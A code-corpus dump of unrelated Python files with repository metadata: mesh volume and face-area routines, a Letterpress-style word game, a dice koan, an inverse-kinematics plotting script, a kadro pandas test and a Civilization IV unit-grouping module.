# /| / |
# / | / |
# / | / |
# node(i,j,k) node(i,j+1,k)
# A -------------- B |
# | H ----------|---- G
# | /cell(i,j) | /
# | / I | /
# | / | /
# D -------------- C
# node(i+1,j,k) node(i+1,j+1,k)
@property
def cell_volumes(self):
"""
Construct cell volumes of the 3D model as 1d array
"""
if getattr(self, "_cell_volumes", None) is None:
if self.dim == 2:
A, B, C, D = index_cube("ABCD", self.vnN)
normal, area = face_info(
np.c_[self.gridN, np.zeros((self.nN, 1))], A, B, C, D
)
self._cell_volumes = area
elif self.dim == 3:
# Each polyhedron can be decomposed into 5 tetrahedrons
# However, this presents a choice so we may as well divide in
# two ways and average.
A, B, C, D, E, F, G, H = index_cube("ABCDEFGH", self.vnN)
                vol1 = (
                    volume_tetrahedron(self.gridN, A, B, D, E)  # cut edge top
                    + volume_tetrahedron(self.gridN, B, E, F, G)  # cut edge top
                    + volume_tetrahedron(self.gridN, B, D, E, G)  # middle
                    + volume_tetrahedron(self.gridN, B, C, D, G)  # cut edge bottom
                    + volume_tetrahedron(self.gridN, D, E, G, H)  # cut edge bottom
                )
                vol2 = (
                    volume_tetrahedron(self.gridN, A, F, B, C)  # cut edge top
                    + volume_tetrahedron(self.gridN, A, E, F, H)  # cut edge top
                    + volume_tetrahedron(self.gridN, A, H, F, C)  # middle
                    + volume_tetrahedron(self.gridN, C, H, D, A)  # cut edge bottom
                    + volume_tetrahedron(self.gridN, C, G, H, F)  # cut edge bottom
                )
self._cell_volumes = (vol1 + vol2) / 2
return self._cell_volumes
@property
def face_areas(self):
"""
Area of the faces
"""
if (
getattr(self, "_face_areas", None) is None
or getattr(self, "_normals", None) is None
):
# Compute areas of cell faces
if self.dim == 2:
xy = self.gridN
A, B = index_cube("AB", self.vnN, self.vnFx)
edge1 = xy[B, :] - xy[A, :]
normal1 = np.c_[edge1[:, 1], -edge1[:, 0]]
area1 = _length2D(edge1)
A, D = index_cube("AD", self.vnN, self.vnFy)
# Note that we are doing A-D to make sure the normal points the
# right way.
# Think about it. Look at the picture. Normal points towards C
# iff you do this.
edge2 = xy[A, :] - xy[D, :]
normal2 = np.c_[edge2[:, 1], -edge2[:, 0]]
area2 = _length2D(edge2)
self._face_areas = np.r_[mkvc(area1), mkvc(area2)]
self._normals = [_normalize2D(normal1), _normalize2D(normal2)]
elif self.dim == 3:
A, E, F, B = index_cube("AEFB", self.vnN, self.vnFx)
normal1, area1 = face_info(
self.gridN, A, E, F, B, average=False, normalizeNormals=False
)
A, D, H, E = index_cube("ADHE", self.vnN, self.vnFy)
normal2, area2 = face_info(
self.gridN, A, D, H, E, average=False, normalizeNormals=False
)
A, B, C, D = index_cube("ABCD", self.vnN, self.vnFz)
normal3, area3 = face_info(
self.gridN, A, B, C, D, average=False, normalizeNormals=False
)
self._face_areas = np.r_[mkvc(area1), mkvc(area2), mkvc(area3)]
self._normals = [normal1, normal2, normal3]
return self._face_areas
@property
def face_normals(self):
"""
Face normals: calling this will average
the computed normals so that there is one
per face. This is especially relevant in
3D, as there are up to 4 different normals
for each face that will be different.
To reshape the normals into a matrix and get the y component::
NyX, NyY, NyZ = M.reshape(M.face_normals, 'F', 'Fy', 'M')
"""
if getattr(self, "_normals", None) is None:
self.face_areas # calling .face_areas will create the face normals
if self.dim == 2:
return _normalize2D(np.r_[self._normals[0], self._normals[1]])
elif self.dim == 3:
normal1 = (
self._normals[0][0]
+ self._normals[0][1]
+ self._normals[0][2]
+ self._normals[0][3]
) / 4
normal2 = (
self._normals[1][0]
+ self._normals[1][1]
+ self._normals[1][2]
+ self._normals[1][3]
) / 4
normal3 = (
self._normals[2][0]
+ self._normals[2][1]
+ self._normals[2][2]
+ self._normals[2][3]
) / 4
return _normalize3D(np.r_[normal1, normal2, normal3])
@property
def edge_lengths(self):
"""Edge lengths"""
if getattr(self, "_edge_lengths", None) is None:
if self.dim == 2:
xy = self.gridN
A, D = index_cube("AD", self.vnN, self.vnEx)
edge1 = xy[D, :] - xy[A, :]
A, B = index_cube("AB", self.vnN, self.vnEy)
edge2 = xy[B, :] - xy[A, :]
self._edge_lengths = np.r_[mkvc(_length2D(edge1)), mkvc(_length2D(edge2))]
self._edge_tangents = np.r_[edge1, edge2] / np.c_[self._edge_lengths, self._edge_lengths]
elif self.dim == 3:
xyz = self.gridN
A, D = index_cube("AD", self.vnN, self.vnEx)
edge1 = xyz[D, :] - xyz[A, :]
A, B = index_cube("AB", self.vnN, self.vnEy)
edge2 = xyz[B, :] - xyz[A, :]
A, E = index_cube("AE", self.vnN, self.vnEz)
edge3 = xyz[E, :] - xyz[A, :]
self._edge_lengths = np.r_[
mkvc(_length3D(edge1)),
mkvc(_length3D(edge2)),
mkvc(_length3D(edge3)),
]
self._edge_tangents = (
np.r_[edge1, edge2, edge3]
/ np.c_[self._edge_lengths, self._edge_lengths, self._edge_lengths]
)
return self._edge_lengths
@property
def edge_tangents(self):
"""Edge tangents"""
if getattr(self, "_edge_tangents", None) is None:
self.edge_lengths # calling .edge_lengths will create the tangents
return self._edge_tangents
# DEPRECATIONS
vol = deprecate_property("cell_volumes", "vol", removal_version="1.0.0")
area = deprecate_property("face_areas", "area", removal_version="1.0.0")
edge = deprecate_property("edge_lengths", "edge", removal_version="1.0.0")
# tangent already deprecated in BaseMesh
# normals already deprecated in BaseMesh
| 35.804933 | 105 | 0.450686 |
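The cell_volumes property in the record above splits each curvilinear hexahedron into five tetrahedra in two different ways and averages the two results. The tetrahedron volume it leans on is the standard determinant formula, sketched here outside of discretize (tet_volume is a name made up for this example):
import numpy as np
def tet_volume(a, b, c, d):
    # V = |det([b - a, c - a, d - a])| / 6 for vertices a, b, c, d in R^3.
    return abs(np.linalg.det(np.stack([b - a, c - a, d - a]))) / 6.0
a, b, c, d = (np.array(p, dtype=float) for p in ([0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 1]))
print(tet_volume(a, b, c, d))  # 0.1666..., one sixth of the unit cube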
aaaf433fe278a9910cd1bad3df2a801d2f72ee30
| 13,830 |
py
|
Python
|
Archive (old files)/pypress(alpha)-20151205.py
|
avisma/pypress
|
07f9d0db175f773453c383ef95401f7ee5623cc9
|
[
"MIT"
] | null | null | null |
Archive (old files)/pypress(alpha)-20151205.py
|
avisma/pypress
|
07f9d0db175f773453c383ef95401f7ee5623cc9
|
[
"MIT"
] | null | null | null |
Archive (old files)/pypress(alpha)-20151205.py
|
avisma/pypress
|
07f9d0db175f773453c383ef95401f7ee5623cc9
|
[
"MIT"
] | null | null | null |
# pypress.py
# Designed by Ben Underwood and Justin Kim
# A version of Letterpress for Python
# Original game designed and published by atebits
from graphics import *
import string
import random
import lib_button as button
def setAllActive(ButtonList):
for i in ButtonList:
i.activate()
def turnSwitch():
global color
global lastColor
if color == "blue":
color = "red"
lastColor = "blue"
elif color == "red":
color = "blue"
lastColor = "red"
def makeScore(chosenLetters):
letterList = []
for i in range(len(chosenLetters)):
letterList.append(chosenLetters[i])
return letterList
def isClicked(click, box):
    """Return (letter, index) for the letter tile hit by `click`, claiming that
    tile for the current player; returns (None, None) when no tile was hit."""
    global oldColor
    print(oldColor)
    letter = None
    boxClicked = None
    for i, tile in enumerate(box):
        if tile.clicked(click):
            letter = tile.getLabel()
            tile.deactivate()
            oldColor[i] = lastColor
            tile.setFill(color, color)
            boxClicked = i
            break
    return letter, boxClicked
def main():
####### Make Function? #####
win = GraphWin("pypress.py", 700, 600)
win.setCoords(0, 0, 700, 600)
box = ["","","","","","","","","","","","","",
"","","","","","","","","","","",""]
upLeft = Point(100, 500)
downRight = Point(150, 450)
width = 100# downRight.getX() - upLeft.getX()
height = 100# upLeft.getY() - downRight.getY()
center = Point(150, 50) ##Revert if needed##
for i in range(25): # Draw Buttons
box[i] = button.Button(win, center, width, height, str(box[i]))
## box[i] = Rectangle(upLeft, Point(200, 400))
## box[i].draw(win)
if not i in [4, 9, 14, 19]:
if round(center.getX()) in [150, 350, 550]:
center.move(0, 100)
else:
center.move(0, -100)
else:
center.move(100, 0)
#center.move(dx, dy)
## box[i].move(100 * i - (500 * (int(i/5))), -100 * (int(i/5)))
## for click in range(10):
## x = win.getMouse()
## x.draw(win)
## print(x.getX(), x.getY())
##
########
######## Make Function? #####
global letters
letters = []
for i in range(25): # Label buttons
letters.append(random.choice(string.ascii_uppercase))
box[i].label.setSize(20)
box[i].label.setText(letters[i])
box[i].activate()
print(letters, "\n")
## tile = Text(downRight, letters[i])
##
## tile.move(100 * i - (500 * (int(i/5))), -100 * (int(i/5)))
##
## tile.setSize(20)
##
## tile.draw(win)
########
submitButton = button.Button(win, Point(650, 550), 70, 30, "submit!")
submitButton.activate()
#submitText.draw(win)
#Rectangle(Point(615, 565), Point(685, 535)).draw(win)
####### Make Function? ###
chosenLetters = ""
drawChosenLetters = Text(Point(350, 550), chosenLetters)
drawChosenLetters.setSize(20)
drawChosenLetters.draw(win)
#######
#boxIndex = list(range(25))
global color
global lastColor
global oldColor
color = "blue"
lastColor = "light gray"
oldColor = [None] * 25
testCount = 0
submit = False
invalidText = Text(Point(650, 515), "Not a valid word!")
redLetters = []
blueLetters = []
    # Load the word list once: calling .read() on every submit exhausts the file
    # after the first check, making every later word look invalid.
    with open("wordlist.txt") as wordfile:
        wordlist = set(wordfile.read().lower().split())
while (len(redLetters) + len(blueLetters)) < 25:
while True:
click = win.getMouse()
if submitButton.clicked(click):
                if chosenLetters.lower() not in wordlist:
invalidText.draw(win)
print(chosenLetters)
else:
submitButton.deactivate()
print("Breaking...")
break
## if 620 < click.getX() < 680:
##
## if 520 < click.getY() < 580:
## submit = True
## for i in range(25):
## letters.append(box[i].getLabel())
##
## print(letters)
letter, boxClicked = isClicked(click, box)
if letter != None:
chosenLetters = chosenLetters + letter
try:
if letters[boxClicked] != None:
print("Removing from 'letters'")
print(boxClicked)
letters[boxClicked] = None
else:
print("valueError... Redirecting...")
if color == 'blue':
try:
if oldColor[boxClicked] == color:
blueLetters.remove(letter)
print("Blue clicked their own letter.")
else:
print("Removing from Red")
redLetters.remove(letter)
print("No more of this letter? "
"removed letter from Red")
except ValueError:
if letter in blueLetters:
print("Never mind")
blueLetters.remove(letter) # See below comment
pass
elif color == 'red':
try:
if oldColor[boxClicked] == color:
redLetters.remove(letter)
print("Red clicked their own letter.")
else:
print("Removing from Blue")
blueLetters.remove(letter)
print("No more of this letter? "
'removed letter from Blue')
except ValueError:
if letter in redLetters:
print("Never mind")
redLetters.remove(letter) #At this point, the
# letter has already been
# added to 'chosenLetters'.
# Removing the existing
# letter from the list
# prevents the program from
# duplicating the letter,
# as the letter will be
# re-added as part of the
# new word.
pass
else: print('Neither team\n',letters)
except IndexError:
print("Index Error, Redirecting...")
print(letters)
print(len(letters))
drawChosenLetters.setText(chosenLetters)
## if 500 > click.getY() > 400:
##
## if 100 < click.getX() < 200:
##
## chosenLetters = chosenLetters + (letters[0])
##
## letters[0] = ""
##
## drawChosenLetters.setText(chosenLetters)
##
## elif click.getX() < 300:
##
## chosenLetters = chosenLetters + (letters[1])
## letters[1] = ""
## drawChosenLetters.setText(chosenLetters)
##
## elif click.getX() < 400:
## chosenLetters = chosenLetters
letterList = makeScore(chosenLetters)
if color == 'blue':
blueLetters = blueLetters + letterList
elif color == 'red':
redLetters = redLetters + letterList
print(blueLetters, redLetters)
turnSwitch()
chosenLetters = ""
drawChosenLetters.setText(chosenLetters)
print("Switching Turns")
testCount = testCount + 1
submit = True
submitButton.activate()
setAllActive(box)
print("Finished!")
print(letters)
print(len(blueLetters), len(redLetters))
print(len(letters))
print("Exiting...")
win.getMouse()
win.close()
if __name__ == "__main__":
main()
| 13,830 | 13,830 | 0.464208 |
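In main() above, the 25 button centres are produced by nudging a single Point around the board with center.move calls, which is hard to follow. A small sketch of the same 5x5 grid computed directly from row and column indices (board_centres and its defaults are illustrative, not taken from the script):
def board_centres(origin_x=150, origin_y=50, step=100, size=5):
    # Yield (index, x, y) for a size-by-size grid of button centres.
    for row in range(size):
        for col in range(size):
            yield row * size + col, origin_x + step * col, origin_y + step * row
for i, x, y in board_centres():
    # In the real script this is where button.Button(win, Point(x, y), 100, 100, "") would go.
    print(i, x, y)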
feb98ce1b41e302847a5e10389f9d6d3e747abad
| 1,822 |
py
|
Python
|
python_koans/python3/koans/about_dice_project.py
|
kipel/koans
|
752ce65a99c27a0e766276039bf48b4a5e98e62a
|
[
"MIT"
] | null | null | null |
python_koans/python3/koans/about_dice_project.py
|
kipel/koans
|
752ce65a99c27a0e766276039bf48b4a5e98e62a
|
[
"MIT"
] | null | null | null |
python_koans/python3/koans/about_dice_project.py
|
kipel/koans
|
752ce65a99c27a0e766276039bf48b4a5e98e62a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
import random
class DiceSet:
def __init__(self):
self._values = None
@property
def values(self):
return self._values
def roll(self, n):
from random import randint
self._values = [randint(1, 6) for _ in range(n)]
class AboutDiceProject(Koan):
def test_can_create_a_dice_set(self):
dice = DiceSet()
self.assertTrue(dice)
def test_rolling_the_dice_returns_a_set_of_integers_between_1_and_6(self):
dice = DiceSet()
dice.roll(5)
self.assertTrue(isinstance(dice.values, list), "should be a list")
self.assertEqual(5, len(dice.values))
for value in dice.values:
self.assertTrue(value >= 1 and value <= 6, "value " + str(value) + " must be between 1 and 6")
def test_dice_values_do_not_change_unless_explicitly_rolled(self):
dice = DiceSet()
dice.roll(5)
first_time = dice.values
second_time = dice.values
self.assertEqual(first_time, second_time)
def test_dice_values_should_change_between_rolls(self):
dice = DiceSet()
dice.roll(5)
first_time = dice.values
dice.roll(5)
second_time = dice.values
self.assertNotEqual(first_time, second_time, \
"Two rolls should not be equal")
# THINK ABOUT IT:
#
# If the rolls are random, then it is possible (although not
# likely) that two consecutive rolls are equal. What would be a
# better way to test this?
def test_you_can_roll_different_numbers_of_dice(self):
dice = DiceSet()
dice.roll(3)
self.assertEqual(3, len(dice.values))
dice.roll(1)
self.assertEqual(1, len(dice.values))
| 27.19403 | 106 | 0.629528 |
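The THINK ABOUT IT note above asks how to test that rolls change without a flaky one-in-6**5 failure. One common answer, sketched here as a standalone test rather than a patch to the koans, is to re-roll many times and only require that some roll differs:
import unittest
from random import randint
class DiceSet:
    def __init__(self):
        self._values = None
    @property
    def values(self):
        return self._values
    def roll(self, n):
        self._values = [randint(1, 6) for _ in range(n)]
class TestRollsChange(unittest.TestCase):
    def test_values_eventually_change_between_rolls(self):
        dice = DiceSet()
        dice.roll(5)
        first = dice.values
        # 100 independent 5-dice rolls all equal to `first` has probability 6**-500.
        changed = False
        for _ in range(100):
            dice.roll(5)
            if dice.values != first:
                changed = True
                break
        self.assertTrue(changed, "rolls never changed across 100 attempts")
if __name__ == "__main__":
    unittest.main()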
c4a3dfabddf483ac731b96b800cddbc7386067bf
| 60 |
py
|
Python
|
Tutorial/Python Bootcamp/Src/Day #17/game.py
|
lzzzam/Python_Scripts
|
f35c1acef13642e444b50d21dc94d9de2ce5d322
|
[
"MIT"
] | null | null | null |
Tutorial/Python Bootcamp/Src/Day #17/game.py
|
lzzzam/Python_Scripts
|
f35c1acef13642e444b50d21dc94d9de2ce5d322
|
[
"MIT"
] | null | null | null |
Tutorial/Python Bootcamp/Src/Day #17/game.py
|
lzzzam/Python_Scripts
|
f35c1acef13642e444b50d21dc94d9de2ce5d322
|
[
"MIT"
] | null | null | null |
import quiz
game = quiz.game(quiz.questionTable)
game.run()
| 15 | 36 | 0.766667 |
9103716f240ebb685edfea1d7dd588c839f6b9f0
| 1,712 |
py
|
Python
|
examples/plot_trajectory.py
|
rock-learning/approxik
|
877d50d4d045457593a2fafefd267339a11de20f
|
[
"BSD-3-Clause"
] | 1 |
2020-03-27T01:53:57.000Z
|
2020-03-27T01:53:57.000Z
|
examples/plot_trajectory.py
|
rock-learning/approxik
|
877d50d4d045457593a2fafefd267339a11de20f
|
[
"BSD-3-Clause"
] | null | null | null |
examples/plot_trajectory.py
|
rock-learning/approxik
|
877d50d4d045457593a2fafefd267339a11de20f
|
[
"BSD-3-Clause"
] | 1 |
2020-12-18T02:09:21.000Z
|
2020-12-18T02:09:21.000Z
|
import sys
import pytransform.rotations as pyrot
from visualization import *
from utils import parse_args
from convert import trajectory_ik, trajectory_fk, timing_report, reaching_report
from approxik import ApproxInvKin, ExactInvKin
def print_usage():
print("Usage: <script> <filename> [<base_link> <endeffector_link>] "
"trajectory <file>")
if __name__ == "__main__":
try:
i = sys.argv.index("trajectory")
except ValueError:
print_usage()
exit(1)
if len(sys.argv) < i + 2:
print_usage()
exit(1)
trajectory_filename = sys.argv[i + 1]
print("Using trajectory from file '%s'" % trajectory_filename)
filename, base_link, ee_link = parse_args()
aik = ApproxInvKin(filename, base_link, ee_link, 1.0, 0.001, verbose=0)
eik = ExactInvKin(filename, base_link, ee_link, 1e-4, 200, verbose=0)
P = np.loadtxt(trajectory_filename)
Qa, timings = trajectory_ik(P, aik)
reaching_report(P, Qa, aik, label="Approximate IK")
timing_report(timings, "Approximate IK")
Pa = trajectory_fk(Qa, aik)
Qe, timings, reachable = trajectory_ik(P, eik, return_reachable=True)
reaching_report(P, Qe, eik, label="Exact IK")
timing_report(timings, "Exact IK")
Pe = trajectory_fk(Qe, eik)
Pe[np.logical_not(reachable)] = np.nan
Qe[np.logical_not(reachable)] = np.nan
ax = plot_pose_trajectory(P, Pa)
ax.set_xlim((0.2, 0.7))
ax.set_ylim((-0.25, 0.25))
ax.set_zlim((0.5, 1.0))
ax = plot_pose_trajectory(P, Pe)
ax.set_xlim((0.2, 0.7))
ax.set_ylim((-0.25, 0.25))
ax.set_zlim((0.5, 1.0))
plot_joint_trajectories([Qa, Qe], labels=["Approximation", "Exact"])
plt.show()
| 30.035088 | 80 | 0.663551 |
8ea8db2352a0314c9858182ef4ae7682d7b0b322
| 847 |
py
|
Python
|
kadro/tests/test_composability.py
|
koaning/kadro
|
cbf993e5142d1ade26ac5922d7d15784d56b3db6
|
[
"MIT"
] | 13 |
2017-03-01T15:19:43.000Z
|
2021-09-23T21:02:27.000Z
|
kadro/tests/test_composability.py
|
koaning/kadro
|
cbf993e5142d1ade26ac5922d7d15784d56b3db6
|
[
"MIT"
] | 9 |
2017-02-03T10:13:22.000Z
|
2018-05-28T21:26:10.000Z
|
kadro/tests/test_composability.py
|
koaning/kadro
|
cbf993e5142d1ade26ac5922d7d15784d56b3db6
|
[
"MIT"
] | 3 |
2018-03-20T03:41:28.000Z
|
2020-07-03T06:00:16.000Z
|
import unittest
import numpy as np
import pandas as pd
import kadro as kd
np.random.seed(42)
n = 20
df = pd.DataFrame({
'a': np.random.randn(n),
'b': np.random.randn(n),
'c': ['foo' if x > 0.5 else 'bar' for x in np.random.rand(n)],
'd': ['fizz' if x > 0.6 else 'bo' for x in np.random.rand(n)]
})
df = df.sort_values(['c', 'd'])
kf = kd.Frame(df)
class Composables(unittest.TestCase):
def test_compose1(self):
"""Test that grouping has an effect on mutate."""
new = (kf
.group_by('c', 'd')
.mutate(e = lambda _: _['a'].shift())
.ungroup())
self.assertEqual(len(new.groups), 0)
self.assertEqual(new.df.iloc[0]['a'], new.df.iloc[1]['e'])
self.assertEqual(np.isnan(new.df.iloc[0]['e']), True)
if __name__ == '__main__':
unittest.main()
| 27.322581 | 66 | 0.566706 |
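For reference, the grouped shift that test_compose1 exercises corresponds to a one-line pandas expression. This sketch builds a similar synthetic frame and is not part of the kadro test suite:
import numpy as np
import pandas as pd
np.random.seed(42)
n = 20
df = pd.DataFrame({
    'a': np.random.randn(n),
    'c': ['foo' if x > 0.5 else 'bar' for x in np.random.rand(n)],
    'd': ['fizz' if x > 0.6 else 'bo' for x in np.random.rand(n)],
}).sort_values(['c', 'd'])
# Shift 'a' within each (c, d) group; the first row of every group becomes NaN.
df['e'] = df.groupby(['c', 'd'])['a'].shift()
print(df.head())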
2d803caf4c2e033c8297442743477ec654ed993f
| 11,750 |
py
|
Python
|
Assets/Python/BUG/UnitGrouper.py
|
Imperator-Knoedel/Sunset
|
19c95f4844586b96341f3474b58e0dacaae485b9
|
[
"MIT"
] | 1 |
2019-08-05T18:36:14.000Z
|
2019-08-05T18:36:14.000Z
|
Assets/Python/BUG/UnitGrouper.py
|
Imperator-Knoedel/Sunset
|
19c95f4844586b96341f3474b58e0dacaae485b9
|
[
"MIT"
] | null | null | null |
Assets/Python/BUG/UnitGrouper.py
|
Imperator-Knoedel/Sunset
|
19c95f4844586b96341f3474b58e0dacaae485b9
|
[
"MIT"
] | null | null | null |
## UnitGrouper
##
## Builds groups of units for use in reporting or screens.
##
## Copyright (c) 2008 The BUG Mod.
##
## Author: EmperorFool
from CvPythonExtensions import *
import BugUtil
import UnitUtil
from Consts import *
from RFCUtils import utils
# BUG - Mac Support - start
BugUtil.fixSets(globals())
# BUG - Mac Support - end
# globals
gc = CyGlobalContext()
# Base grouping classes
class Grouper:
"""
Holds all Grouping definitions.
"""
def __init__(self):
self.groupings = []
self.groupingsByKey = {}
def _addGrouping(self, grouping):
grouping.index = len(self.groupings)
self.groupings.append(grouping)
self.groupingsByKey[grouping.key] = grouping
def getGrouping(self, key):
if key in self.groupingsByKey:
return self.groupingsByKey[key]
else:
return None
def __getitem__(self, key):
if isinstance(key, int):
return self.groupings[key]
else:
			return self.groupingsByKey[key]
def __iter__(self):
return self.groupings.__iter__()
def iterkeys(self):
return self.groupingsByKey.iterkeys()
def itervalues(self):
return self.groupingsByKey.itervalues()
def iteritems(self):
return self.groupingsByKey.iteritems()
class Grouping:
"""
Applies a formula to place units into groups.
key: used for sorting groupings; must be in the range [0, 999] inclusive
title: used to display the group
"""
def __init__(self, key, title):
self.index = None
self.key = key
if title.startswith("TXT_KEY_"):
self.title = BugUtil.getPlainText(title)
else:
self.title = title
self.groups = {}
def _addGroup(self, group):
self.groups[group.key] = group
def calcGroupKeys(self, unit, player, team):
return None
class Group:
"""
Represents a single group value within a grouping.
key: used for sorting groups; must be in the range [0, 999] inclusive
title: used to display the group
"""
def __init__(self, grouping, key, title):
self.grouping = grouping
self.key = key
if title.startswith("TXT_KEY_"):
self.title = BugUtil.getPlainText(title)
else:
self.title = title
def getTitle(self):
return self.title
# Grouping definitions
class UnitTypeGrouping(Grouping):
"""
Groups units by their unit type.
Ex: Warrior, Maceman, Panzer
"""
def __init__(self):
Grouping.__init__(self, "type", "TXT_KEY_UNIT_GROUPER_TYPE_GROUPING")
for i in range(gc.getNumUnitInfos()):
if i in dFemaleGreatPeople.values(): continue # combine female and male units
info = gc.getUnitInfo(i)
if info:
self._addGroup(Group(self, i, info.getDescription()))
def calcGroupKeys(self, unit, player, team):
iUnitType = utils.getDefaultGreatPerson(unit.getUnitType()) # merge male and female GP
return (iUnitType,)
class UnitCombatGrouping(Grouping):
"""
Groups units by their combat type.
Ex: None, Melee, Gunpowder, Naval
"""
def __init__(self):
Grouping.__init__(self, "combat", "TXT_KEY_UNIT_GROUPER_COMBAT_GROUPING")
self.NONE = 0
self._addGroup(Group(self, self.NONE, "TXT_KEY_UNIT_GROUPER_COMBAT_GROUP_NONE"))
for i in range(gc.getNumUnitCombatInfos()):
info = gc.getUnitCombatInfo(i)
if info:
self._addGroup(Group(self, i + 1, info.getDescription()))
def calcGroupKeys(self, unit, player, team):
return (gc.getUnitInfo(unit.getUnitType()).getUnitCombatType() + 1,)
class LevelGrouping(Grouping):
"""
Groups units by their level, 1 to MAX_LEVEL (50).
Units over level MAX_LEVEL are put into the MAX_LEVEL group.
"""
def __init__(self):
Grouping.__init__(self, "level", "TXT_KEY_UNIT_GROUPER_LEVEL_GROUPING")
self.MAX_LEVEL = 50
for i in range(self.MAX_LEVEL):
self._addGroup(Group(self, i, BugUtil.getText("TXT_KEY_UNIT_GROUPER_LEVEL_GROUP", (str(i),))))
self._addGroup(Group(self, self.MAX_LEVEL, BugUtil.getText("TXT_KEY_UNIT_GROUPER_LEVEL_GROUP", ("%d+" % self.MAX_LEVEL,))))
def calcGroupKeys(self, unit, player, team):
return (max(0, min(unit.getLevel(), self.MAX_LEVEL)),)
class PromotionGrouping(Grouping):
"""
Groups units by their promotions.
Ex: Combat 1, Cover, Tactics
"""
def __init__(self):
Grouping.__init__(self, "promo", "TXT_KEY_UNIT_GROUPER_PROMOTION_GROUPING")
self.NONE = 0
self.NO_PROMOS = (0,)
self._addGroup(Group(self, self.NONE, "TXT_KEY_UNIT_GROUPER_PROMOTION_GROUP_NONE"))
for i in range(gc.getNumPromotionInfos()):
info = gc.getPromotionInfo(i)
if info:
self._addGroup(Group(self, i + 1, '<img=%s size=16></img> %s' %
(info.getButton(), info.getDescription())))
def calcGroupKeys(self, unit, player, team):
promos = []
for iPromo in range(gc.getNumPromotionInfos()):
if unit.isHasPromotion(iPromo):
promos.append(iPromo + 1)
if not promos:
promos = self.NO_PROMOS
return promos
class LocationGrouping(Grouping):
"""
Groups units by their location on the map.
Ex: Domestic City, Friendly City, Enemy Territory
"""
def __init__(self):
Grouping.__init__(self, "loc", "TXT_KEY_UNIT_GROUPER_LOCATION_GROUPING")
(
self.DOMESTIC_CITY,
self.DOMESTIC_TERRITORY,
self.TEAM_CITY,
self.TEAM_TERRITORY,
self.FRIENDLY_CITY,
self.FRIENDLY_TERRITORY,
self.NEUTRAL_TERRITORY,
self.ENEMY_TERRITORY,
self.BARBARIAN_TERRITORY
) = range(9)
self._addGroup(Group(self, self.DOMESTIC_CITY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_DOMESTIC_CITY"))
self._addGroup(Group(self, self.DOMESTIC_TERRITORY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_DOMESTIC_TERRITORY"))
self._addGroup(Group(self, self.TEAM_CITY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_TEAM_CITY"))
self._addGroup(Group(self, self.TEAM_TERRITORY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_TEAM_TERRITORY"))
self._addGroup(Group(self, self.FRIENDLY_CITY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_FRIENDLY_CITY"))
self._addGroup(Group(self, self.FRIENDLY_TERRITORY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_FRIENDLY_TERRITORY"))
self._addGroup(Group(self, self.NEUTRAL_TERRITORY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_NEUTRAL_TERRITORY"))
self._addGroup(Group(self, self.ENEMY_TERRITORY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_ENEMY_TERRITORY"))
self._addGroup(Group(self, self.BARBARIAN_TERRITORY, "TXT_KEY_UNIT_GROUPER_LOCATION_GROUP_BARBARIAN_TERRITORY"))
def calcGroupKeys(self, unit, player, team):
plot = unit.plot()
if not plot or plot.isNone():
return None
if plot.isBarbarian():
return (self.BARBARIAN_TERRITORY,)
teamId = team.getID()
ownerId = plot.getRevealedOwner(teamId, False)
if ownerId == -1:
return (self.NEUTRAL_TERRITORY,)
elif ownerId == player.getID():
if plot.isCity():
return (self.DOMESTIC_CITY,)
else:
return (self.DOMESTIC_TERRITORY,)
else:
owner = gc.getPlayer(ownerId)
ownerTeamId = owner.getTeam()
if ownerTeamId == teamId:
if plot.isCity():
return (self.TEAM_CITY,)
else:
return (self.TEAM_TERRITORY,)
elif team.isAtWar(ownerTeamId):
return (self.ENEMY_TERRITORY,)
else:
if plot.isCity():
return (self.FRIENDLY_CITY,)
else:
return (self.FRIENDLY_TERRITORY,)
class OrderGrouping(Grouping):
"""
Groups units by their current order/action.
Ex: Fortify, Go To, Blockade
"""
def __init__(self):
Grouping.__init__(self, "order", "TXT_KEY_UNIT_GROUPER_ORDER_GROUPING")
(
self.ORDER_NONE,
self.ORDER_SKIP,
self.ORDER_SLEEP,
self.ORDER_FORTIFY,
self.ORDER_HEAL,
self.ORDER_SENTRY,
self.ORDER_INTERCEPT,
self.ORDER_PATROL,
self.ORDER_PLUNDER,
self.ORDER_BUILD,
self.ORDER_CONSTRUCT,
self.ORDER_GOTO,
self.ORDER_EXPLORE,
self.ORDER_AUTO_BUILD,
self.ORDER_AUTO_NETWORK,
self.ORDER_AUTO_CITY,
self.ORDER_AUTO_RELIGION,
self.ORDER_OTHER,
) = range(18)
self._addGroup(Group(self, self.ORDER_NONE, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_NONE"))
self._addGroup(Group(self, self.ORDER_SKIP, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_SKIP"))
self._addGroup(Group(self, self.ORDER_SLEEP, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_SLEEP"))
self._addGroup(Group(self, self.ORDER_FORTIFY, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_FORTIFY"))
self._addGroup(Group(self, self.ORDER_HEAL, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_HEAL"))
self._addGroup(Group(self, self.ORDER_SENTRY, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_SENTRY"))
self._addGroup(Group(self, self.ORDER_INTERCEPT, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_INTERCEPT"))
self._addGroup(Group(self, self.ORDER_PATROL, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_PATROL"))
self._addGroup(Group(self, self.ORDER_PLUNDER, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_PLUNDER"))
self._addGroup(Group(self, self.ORDER_BUILD, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_BUILD"))
self._addGroup(Group(self, self.ORDER_CONSTRUCT, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_CONSTRUCT"))
self._addGroup(Group(self, self.ORDER_GOTO, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_GOTO"))
